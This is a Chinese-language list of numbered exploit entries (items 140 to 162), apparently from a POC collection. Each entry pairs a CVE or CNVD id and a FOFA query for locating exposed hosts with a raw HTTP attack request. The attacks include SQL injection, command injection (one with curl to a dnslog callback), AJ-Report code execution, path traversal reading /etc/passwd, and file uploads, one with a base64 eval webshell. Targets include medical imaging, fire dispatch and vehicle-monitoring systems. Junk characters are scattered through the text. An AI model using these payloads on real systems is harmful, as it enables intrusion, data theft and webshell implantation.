7 p0 V: `0 A" s8 N$ J5 `CVE-2024-2566
, ]- \0 ?" E" W |7 cFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ n5 F7 O7 } C1 y: ? ?
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
* ]( D& [2 P5 J& A z' pHost: x.x.x.x
% ?( v! ^( `% s/ U- q3 B$ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.06 J7 b7 h1 v ~5 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ u0 G7 {; f' N+ m- w! zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ U. a+ Y- [8 R# ^5 v0 TAccept-Encoding: gzip, deflate, br+ h! i; x2 l1 @/ y$ D) ]
Connection: close
, a# @8 m0 R# a+ v# iCookie: authcode=h8g96 v8 d1 j4 w. }$ Y9 U; t
Upgrade-Insecure-Requests: 1
5 i/ g) R; X( E- R$ {' X3 u t7 @; t* ]0 u4 T) R( \
! k$ t; \6 a5 o# y4 f
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入. N3 E, S K) I3 C& ~
FOFA:body="指挥调度管理平台"* O; i. o z9 S- e5 b
POST /app/ext/ajax_users.php HTTP/1.1
3 g+ b$ a" F+ R$ f0 ^1 Q: `. UHost: your-ip
& h6 b9 d# `8 t- CUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
# Q( h5 i' k n+ n% ^Content-Type: application/x-www-form-urlencoded* u G2 q& i: ]' E9 |
0 z6 B, N# b0 h) r
8 s! y5 h6 ]4 P, C: a
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -- [1 E3 E9 @6 K4 }% d( W; Z9 y0 X/ c
, d" m" h* R( I3 a; D2 ]
$ D- H8 V% R% }0 \# e
142. CMSV6车辆监控平台系统中存在弱密码
3 C- `8 Q. B4 kCVE-2024-29666
7 {- J1 t% Z$ NFOFA:body="/808gps/"
9 k# p% N+ A& A5 }3 P0 p# B+ Dadmin/admin
* ?5 T; z; _/ t+ Z; ?7 ~143. Netis WF2780 v2.1.40144 远程命令执行& y3 q: g* A% U) h( ~8 u G
CVE-2024-25850
! R6 A' k" f/ dFOFA:title='AP setup' && header='netis'
/ P0 h+ M9 e/ ~ h# R/ `2 HPAYLOAD4 B/ M3 C' }' x: Q% U/ c$ q, a: n
8 a0 T6 h7 |# a144. D-Link nas_sharing.cgi 命令注入
+ B1 f1 W! ], ~- D2 w8 c. H+ }FOFA:app="D_Link-DNS-ShareCenter": }5 t q1 G C g4 d0 F o
system参数用于传要执行的命令6 @' S" t) M, P5 V% O+ O; G$ i$ b
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1 U3 [; d0 d- U, b8 q. B F7 Q% x
Host: x.x.x.x
8 `7 q+ Q% P. \0 fUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
. i' d; F! f5 M' D$ FConnection: close
& w7 ]/ n! p9 P/ O1 s6 d. @Accept: */*
: H+ H% p) V5 I8 V" X% {* ~- } OAccept-Language: en
, Q! v) [$ s( yAccept-Encoding: gzip
# z! v9 z5 H+ }' N$ R. j6 E2 G# D( [1 b) d
3 p6 P1 l, ~5 r: u/ B145. Palo Alto Networks PAN-OS GlobalProtect 命令注入' A1 {1 I( V: ]. y! V8 ~
CVE-2024-3400
+ i" N/ s8 F2 J+ U- `& O5 nFOFA:icon_hash="-631559155"; ^3 `' k* G+ E* x; ~
GET /global-protect/login.esp HTTP/1.1
1 {2 {+ s+ b7 b/ I; pHost: 192.168.30.112:1005
. s$ h; Q& W. o! U) zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
- ]0 S# d7 f0 P( [Connection: close
+ y0 U4 r/ i0 A0 ]' A) yCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;0 Z8 I+ W. a3 |% a5 ~0 D
Accept-Encoding: gzip
! p3 w' p) X" Y+ a a7 [1 N5 F3 m3 w& z. c8 q z) Y
7 O5 J: n: G: O6 n# e
146. MajorDoMo thumb.php 未授权远程代码执行
0 T$ `9 \. F! s5 x$ E ACNVD-2024-02175$ m2 l+ y3 E) c2 C1 a
FOFA:app="MajordomoSL"
1 Y! b. d* C0 X% r4 Y, G2 tGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
7 F$ [$ S0 B% X6 [1 y0 UHost: x.x.x.x* P% d6 [/ `5 L, _5 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
6 a: g7 z7 y' l- p% f, z$ W0 rAccept-Charset: utf-8$ P; d7 V1 }5 t& e+ Z5 S
Accept-Encoding: gzip, deflate
& [) U b7 a: \5 ?Connection: close
( j% `# V6 @2 F- z0 A8 l" }- D1 u! w7 o, M( F2 @" ^6 R
- b7 t0 I. H; N6 h! c8 p147. RaidenMAILD邮件服务器v.4.9.4-路径遍历1 \ `; e7 \6 G V* J! Z2 U, ^
CVE-2024-32399) _- j* n& R J4 D1 S, d
FOFA:body="RaidenMAILD"+ n$ x f9 y$ V6 p3 s* A' r
GET /webeditor/../../../windows/win.ini HTTP/1.1
: ^7 F7 o5 @2 Z5 j! e6 h! Z# EHost: 127.0.0.1:81
% ?9 s2 Y8 @% m6 f h- [Cache-Control: max-age=0# B& k8 ?5 Y' u: [
Connection: close' ?' Q9 Y7 T- P/ K9 X
( N# O Z! I) D" ? j
+ y- A2 C3 v. J# X$ Y9 p
148. CrushFTP 认证绕过模板注入8 ~+ [, u. R+ r+ A1 @# L) B
CVE-2024-4040
H% r. W$ k, {& d8 E; UFOFA:body="CrushFTP", C, Z' _) n6 R6 F$ u5 r
PAYLOAD& R; a+ }6 C8 ]- [9 o
( M$ k) J4 A& H% U3 `; k149. AJ-Report开源数据大屏存在远程命令执行: X3 `# ^2 Y: K! ^0 k" {, {' L. c
FOFA:title="AJ-Report"6 {. Y! j5 P- l2 k2 J
/ }( z. v d" J) [4 cPOST /dataSetParam/verification;swagger-ui/ HTTP/1.18 t# t% w4 i4 a! `" y
Host: x.x.x.x( F' ^% y u0 j! D# F# [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 Z2 s" B+ X4 I8 a, vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 h# [; I$ V: `% @1 R* }7 t4 aAccept-Encoding: gzip, deflate, br
% e! y0 |0 A, o, x8 m5 E# K" [Accept-Language: zh-CN,zh;q=0.9/ \& ^% G; \5 J. w
Content-Type: application/json;charset=UTF-87 w- ]; z: Z$ v a7 Z) n
Connection: close; N i' ]: y) v( e+ r8 s
# a; \" I* }9 c6 d) j{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}2 J F6 H4 B8 r& ~. N6 C) I) \
- U$ w) U% _* }- U150. AJ-Report 1.4.0 认证绕过与远程代码执行
$ N: j2 \* b: Y0 t& l# n( TFOFA:title="AJ-Report"
. }: _7 V( {4 VPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
1 n! L4 ^+ v% n. f+ E* A5 K# AHost: x.x.x.x
) W2 H4 B; F/ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ t* [! c. G6 r' A+ d6 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
q- K( O( `5 C3 }5 ?! TAccept-Encoding: gzip, deflate, br5 l) h9 s' m) |* Y
Accept-Language: zh-CN,zh;q=0.97 b7 L! F7 `' Y, Y
Content-Type: application/json;charset=UTF-8
& ?) k/ H) m2 uConnection: close
3 d( b- X0 i* f0 |Content-Length: 339" k* k: b5 A# q/ S" n
5 E" X+ ~5 l+ |# t* Q5 j# `) {{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
/ R4 Z2 G* c) ]) U* Q! U1 X* z; K7 F6 F5 ~1 v/ _1 w
; j0 W* c) B, L( Q1 {151. AJ-Report 1.4.1 pageList sql注入: p2 Q$ G% g7 M; e
FOFA:title="AJ-Report"
! y. r+ M* n) _# {4 dGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
" l' ]; V( e( L1 @6 T# FHost: x.x.x.x
9 q6 [% b: n" G, v D. `+ IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
@1 b/ Z3 X, t6 gConnection: close
9 @) w: V# Y: S. \ jAccept-Encoding: gzip3 o8 U e' w% A, `' v
* r. G/ ?6 K: M9 ]$ [8 W3 q7 }- J6 n- @ ]; p+ h; v& e( D1 T
152. Progress Kemp LoadMaster 远程命令执行1 \- T! z, h6 Q2 R I. D
CVE-2024-1212
( n* j/ s3 T) j* c$ L0 h8 x1 ]LoadMaster <= 7.2.59.2 (GA)8 |/ X0 v# K( q$ o) ]
LoadMaster<=7.2.54.8 (LTSF)
$ ?2 |7 t/ r" _7 q( }3 j" WLoadMaster <= 7.2.48.10 (LTS) x8 H. l Z% \
FOFA:body="LoadMaster"3 U* ^- _! W, V: C, F2 K/ I
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
( i, |& W5 E% V; g2 jGET /access/set?param=enableapi&value=1 HTTP/1.17 ]6 N0 ]& f" [- X3 p" G. S
Host: x.x.x.x$ V+ Y4 v+ Z- Z+ b' Y# c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
2 q4 V; D K7 [9 j+ t1 p/ I; V& m8 cConnection: close
6 l; ?6 ]: p4 J( D( q8 F$ fAccept: */*/ t$ t. W1 e* J# N
Accept-Language: en
7 B$ W& N. y+ b* @Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
; D% @9 n8 M* TAccept-Encoding: gzip# b5 E0 \- Y8 j7 q" h
! s$ J7 Z+ D: O" a
& f8 z$ g( o7 w! J4 H2 R( E153. gradio任意文件读取
" l: K* s/ ]9 N8 W6 V3 wCVE-2024-1561FOFA:body="__gradio_mode__"
4 m. K2 E( X; R, O* V$ M3 @0 C第一步,请求/config文件获取componets的id. N; \/ c' y7 q: C& M' N8 ?4 C) w
http://x.x.x.x/config
f" ?4 h0 P) R! X" t* c9 `
6 D3 C4 [9 P2 L- i5 I1 b* Y
. L& \" D4 u7 n& s4 P4 U第二步,将/etc/passwd的内容写入到一个临时文件
; ~: V/ L2 i( R& T; N; cPOST /component_server HTTP/1.1% [1 ]* X, U. O9 n( F' o
Host: x.x.x.x
8 x5 S3 m0 h: _0 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.33 }. Z) W( x- M: }
Connection: close L3 A3 h+ X0 ]0 I
Content-Length: 115
( e3 y3 G8 b/ j9 h4 QContent-Type: application/json$ s1 S7 F( ~3 |+ y# o0 o/ l
Accept-Encoding: gzip
; a9 `! ~$ m/ f9 r: i0 j# e# z& n# x3 e! H
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}! r6 F: r% s: q- N) Z
* X J& _- i. Y" v" i5 l
" w, z: x) V9 B/ m6 u4 M第三步访问: p. W7 c/ i- @: m/ ?; p- Z7 J
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
4 W3 {& X Y& b/ w/ |6 e# B/ y9 S3 I0 L9 Q+ R6 i4 }( N4 m4 J& O1 |
3 x' L2 V7 M. m# N% t1 `; `6 A( u
154. 天维尔消防救援作战调度平台 SQL注入
& s0 O- w$ v$ Q' RCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"5 a; E8 L O9 S h& q- _
POST /twms-service-mfs/mfsNotice/page HTTP/1.15 z% v) W) a1 ?4 Y5 e1 n
Host: x.x.x.x
5 x X9 H8 g( D' A# mContent-Length: 106
8 |1 m) @- i* F5 `& SCache-Control: max-age=0
3 f, n5 Y7 @* n6 o/ ?Upgrade-Insecure-Requests: 1
( `2 L" O) ^- {3 v, q3 QOrigin: http://x.x.x.x) e9 t. g1 m1 ?1 M: d
Content-Type: application/json2 m; M; s$ R4 _' [( Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36( ]6 b: ~- E7 H) P! H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( E, Y7 e. s- R; O
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page# c) l/ {$ ^; r' [9 q& x. h+ ~2 D
Accept-Encoding: gzip, deflate7 r) ?+ G( J7 E2 e. N% ~( b
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
2 j9 r: e* N9 g& ]Connection: close
6 n% Y$ [. M( ~5 R G7 u
2 n; X4 |$ n2 R: q# o{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}' G8 u. V7 ?' V4 e
2 n) S8 ~1 i% E# y, ?4 N5 ]8 E4 B1 `' W# k! e( `
155. 六零导航页 file.php 任意文件上传9 U% O$ d2 c% R7 a; j; v- Z5 x0 E
CVE-2024-34982
, z, P: F+ \6 J' |8 \; mFOFA:title=="上网导航 - LyLme Spage"3 d: N/ ~( O+ D5 q* d3 n% w9 F
POST /include/file.php HTTP/1.18 k$ |, ]- L f: p
Host: x.x.x.x
# k# l1 ]+ e2 i/ T1 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 i' U. t7 B1 a, @/ A8 P RConnection: close7 ^1 H& h" Q. v
Content-Length: 232
8 R: l1 G+ ^* Y3 v% I' XAccept: application/json, text/javascript, */*; q=0.01
% E% V$ _0 Y( Q1 ?Accept-Encoding: gzip, deflate, br4 e/ ^& n% l5 U7 W `: @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
P( f' X3 \: C6 RContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
f2 U' ^/ S$ [X-Requested-With: XMLHttpRequest3 n. z& h6 {8 g0 S
" Z! e5 B$ p* H; d5 O; \-----------------------------qttl7vemrsold314zg0f0 L& E8 ~' S( N+ l
Content-Disposition: form-data; name="file"; filename="test.php"
8 ?1 R" u9 D2 b+ l FContent-Type: image/png4 T* s* b' m* O$ m. u
+ f4 }9 b* `9 t( J$ W: I
<?php phpinfo();unlink(__FILE__);?>
! K* I4 I: j& V- l8 Y; s* ^3 z1 f-----------------------------qttl7vemrsold314zg0f--8 k/ a* R5 x5 _0 P. e* O) p; [ f
' h7 H" U0 Q; c9 C$ p' _
4 {8 T' @- D" u4 J7 O访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php. C+ R7 L$ [3 q$ i
4 ]% Q$ O0 u8 f156. TBK DVR-4104/DVR-4216 操作系统命令注入9 `% P% K0 Y+ V
CVE-2024-3721
; I1 f6 a9 w" Y% k4 [: jFOFA:"Location: /login.rsp"( I) t( q" Q3 O
·TBK DVR-4104& d% |+ m4 ^ P {/ {
·TBK DVR-4216
; k$ J C8 E2 z K _. L. _curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"; p9 } v2 ~4 }; Z: n
7 ^6 L, S% r3 W7 ~
" G* e p' a( z+ ?/ `
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
# _9 {% ]$ @% JHost: x.x.x.x
7 ~/ H+ A# U' nUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' u" w% v* Z# G3 w4 N
Connection: close: g( T& Y- f, Q. `6 \* p$ i, m
Content-Length: 0
6 ]' L( h" p: N3 ~ zCookie: uid=1: E% s& Z% k, f1 K. E: y
Accept-Encoding: gzip
" w: `/ u6 k F. C3 |1 G: f" S6 g9 c, }7 r
0 D+ _, M8 S. O4 X
157. 美特CRM upload.jsp 任意文件上传, G- H# _4 f e/ Z
CNVD-2023-06971: o" N! ]8 m- L# V
FOFA:body="/common/scripts/basic.js"! j; a/ ~, a _0 D
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
1 @* [9 u- z: ~+ k4 g! J+ QHost: x.x.x.x
+ r: I+ q0 m* m4 p- TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$ H& K8 U, X i/ v' j& Y( N _3 r" D
Content-Length: 709
2 u+ C- h# x n% G7 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# D! Q& h0 _; i
Accept-Encoding: gzip, deflate
: Y2 j( s4 f9 Q* G* ]6 nAccept-Language: zh-CN,zh;q=0.9
" J- d6 X0 R: e5 m9 T. s8 u9 E0 Y# @$ iCache-Control: max-age=0# V9 W8 ^+ n0 s/ \$ [
Connection: close# F1 b7 o p/ X( e1 B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN) @. |0 B: l0 P, |
Upgrade-Insecure-Requests: 1: ?/ o. z- k8 T3 L# b
4 Z1 l9 \+ L) r" {+ {
------WebKitFormBoundary1imovELzPsfzp5dN- C: p2 w5 _' R2 `, |
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
7 `* |% A% J* s" o/ n& FContent-Type: application/octet-stream' l- B: q3 ?% R q* C. Y
! d" M h: K) Enyhelxrutzwhrsvsrafb4 s0 i" }7 p8 m- X4 n: @( `
------WebKitFormBoundary1imovELzPsfzp5dN
2 \8 o3 i- ?6 O! B _$ w8 iContent-Disposition: form-data; name="key" y# H6 s" D. ?7 j
$ P8 P7 F' j% F: }3 g: e+ \2 L
null
, s% U j* p, r4 M, s------WebKitFormBoundary1imovELzPsfzp5dN' Y6 _' h/ q& Z
Content-Disposition: form-data; name="form": z) t K8 h( {: w
r( y2 ~4 r- Ynull
, w3 [& ?7 [# y0 u" ~------WebKitFormBoundary1imovELzPsfzp5dN
! j% M, b* s/ TContent-Disposition: form-data; name="field"+ G$ n$ B: W+ h6 X
2 r, Z* k9 h- a3 ?# ^
null# u; R5 L5 p1 [. H) D- P' d+ R( e/ L
------WebKitFormBoundary1imovELzPsfzp5dN
+ Q0 L: O* E5 R2 Z ?& RContent-Disposition: form-data; name="filetitile". V8 n6 X. e2 w
1 X: ]4 |0 n1 w, B
null, v% ?, {2 ^+ Y" J0 X) X9 X+ e
------WebKitFormBoundary1imovELzPsfzp5dN3 |% z$ k# u) ~( X, A
Content-Disposition: form-data; name="filefolder"
* R4 C4 J7 e. y9 y5 N2 Q1 B C& q+ g0 N! K( r
null
! }/ }/ F* R( z! z" t; y$ B------WebKitFormBoundary1imovELzPsfzp5dN--
. r* k* V8 h9 M q1 r
4 V3 x7 Q* v! N" ^# X& r5 d3 I% q, ?& o6 j4 ?: F
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp, m( q# K. K! Z$ E: G& E5 ?3 ~+ @* k+ r+ C
- S4 |4 A) D H, n
158. Mura-CMS-processAsyncObject存在SQL注入
0 c) C, P8 E' @! rCVE-2024-32640/ W# z6 p# d" i! {; C+ L- P" r
FOFA:"Generator: Masa CMS"9 N% E/ H9 ?2 ?9 c$ ]+ ]) A
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
& n" v1 M7 [: J' pHost: {{Hostname}}
: l8 O. c" t6 M) D7 g H( NContent-Type: application/x-www-form-urlencoded
# ]$ I/ o) _% x: S( }2 l6 t& o, P
9 I6 Z- w- x |! Xobject=displayregion&contenthistid=x\'&previewid=10 A* g( ~1 Y ]% g) ~" g# ^/ }
! K; I/ k/ H( z. U* B5 a2 n
# o7 B& O1 O' d; j! a) B8 T159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
. z$ W$ x7 p# q1 ZFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
) r5 p3 F: f3 EPOST /webservices/WebJobUpload.asmx HTTP/1.1
6 z/ l% N/ v# t- U; y# ]Host: x.x.x.x0 y: R9 Z6 e% A% S% q& v$ k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
2 [, f9 O4 U; F% }0 IContent-Length: 1080- f6 ]9 i4 o9 V/ Z3 { b0 h
Accept-Encoding: gzip, deflate8 R+ E% s- W$ N% W
Connection: close& G+ a" s( V9 k) y
Content-Type: text/xml; charset=utf-82 g3 ]; Q v% _/ y# L5 u7 k$ \
Soapaction: "http://rainier/jobUpload"6 i) \1 z2 M: o% } G$ f
7 O- A. l5 S; V. q
<?xml version="1.0" encoding="utf-8"?>1 H! H# ~6 B- r+ r4 d: ?0 H: a
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">8 ]4 _+ p6 e$ }7 J
<soap:Body>& r' C1 _$ e( R' {
<jobUpload xmlns="http://rainier">
8 |) j3 N1 x+ r+ ?/ t<vcode>1</vcode>
7 a2 t x8 ]% b! ?/ w! I<subFolder></subFolder>
7 b( L8 h: S7 }: D; I/ _6 h. C<fileName>abcrce.asmx</fileName>, U7 X/ i+ Q# l8 r/ \+ S2 k& o
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
7 ]5 |( Z9 j t( L3 R% Z</jobUpload>
' `: @ R5 o$ q( e6 |% @</soap:Body>( J1 G. g" ?' u) g+ M# Q
</soap:Envelope>+ q; I: q# ?5 D8 |% B
1 I# H. O# p% \* |
& [# }1 M, }' X# D" ^# i0 e, B+ q/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
/ u# y& o5 Q$ W9 B9 z. x7 x: w4 q+ |" r
* d2 C( V0 N$ x" n160. Sonatype Nexus Repository 3目录遍历与文件读取
) Z+ a3 I8 N! A1 xCVE-2024-4956" ]# ` ?) J5 r0 D$ h
FOFA:title="Nexus Repository Manager"
# w. S( S0 o: tGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1/ z5 S/ A& S1 l
Host: x.x.x.x. b) j& ?2 _5 D
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
' G: p4 m3 M+ `4 z1 GConnection: close; Y& N p6 @, u. `6 ~" m
Accept: */*
7 T4 d* E3 }1 ^7 A' F0 f- \$ [9 YAccept-Language: en( w, U! E: ^7 _8 V, ^
Accept-Encoding: gzip
# g7 D( \, @2 c' X0 b( N* B! @7 J E( c6 k0 k* ^
* F/ j0 e- O1 K* l( i7 v161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
; g' ]+ ]( e" e$ }0 bFOFA:body="/KT_Css/qd_defaul.css"
- K8 E/ g3 \" b* {8 t! L# B. a第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
0 N6 G4 q F" z b- C. Y( H, `$ {! o* pPOST /Webservice.asmx HTTP/1.1
6 {$ j$ d, W) _% B2 cHost: x.x.x.x
1 C- |6 `" z+ K% p* i- e+ N0 T- C, SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
L! G3 H3 T- F; l5 f5 ^3 fConnection: close
: e4 [9 R: S# O& v- F& iContent-Length: 445: O1 ~5 {/ W0 S! \1 V: u
Content-Type: text/xml
H, e' i5 I- Q7 l! ZAccept-Encoding: gzip2 l% m5 X" q9 s; S2 J" m
: X( V' @& f+ D6 O& h+ W
<?xml version="1.0" encoding="utf-8"?>
) ]" U5 S& W& a. t8 K I! ?4 [<soap:Envelope xmlns:xsi="
1 ^( J3 U/ P8 I7 u' ?% Z7 F) shttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
1 ^- c* g: j6 l' ]0 T1 ~ Xxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
4 i y. l$ A3 U$ O/ Y) P, ? S& M7 D<soap:Body>
; H# G- W/ K2 b<UploadResume xmlns="http://tempuri.org/">
5 R+ B P. X. C# G<ip>1</ip>
/ M' @4 |6 {6 P2 {% w7 d<fileName>../../../../dizxdell.aspx</fileName>! B3 d* p @9 E3 k: y7 ^
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>! V4 y$ X& o, M7 [. V
<tag>3</tag>$ }8 g) {2 L$ S. x. a' h+ W+ d
</UploadResume>) N# E8 T' S1 J) M) c
</soap:Body>
$ q" F+ Z% X$ a4 b4 y</soap:Envelope>% }( u2 t4 b3 b; B0 X& u: H: [
0 l8 C! j& W5 \
1 \ T) C8 ^6 D) m5 S: U1 I( fhttp://x.x.x.x/dizxdell.aspx& w1 l) _5 g7 Z7 N
7 @1 n' h B5 _
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
7 A3 I/ h3 |$ c# ~7 G' B$ q' N' T VFOFA: app="和丰山海-数字标牌"
" ~" ^4 ?- O# s' n0 ~POST /QH.aspx HTTP/1.1
9 U( R$ Q; f; eHost: x.x.x.x
3 Z& R; ~. n6 W. M4 U. ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0, c ?0 \+ d7 f; `) K: t- U0 Q
Connection: close7 `2 Z5 X( w. L6 z; v+ o- K- ~
Content-Length: 583
3 v8 G9 g+ O) ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey& X. a8 U* d8 t$ ]" R$ d+ E4 X& ^
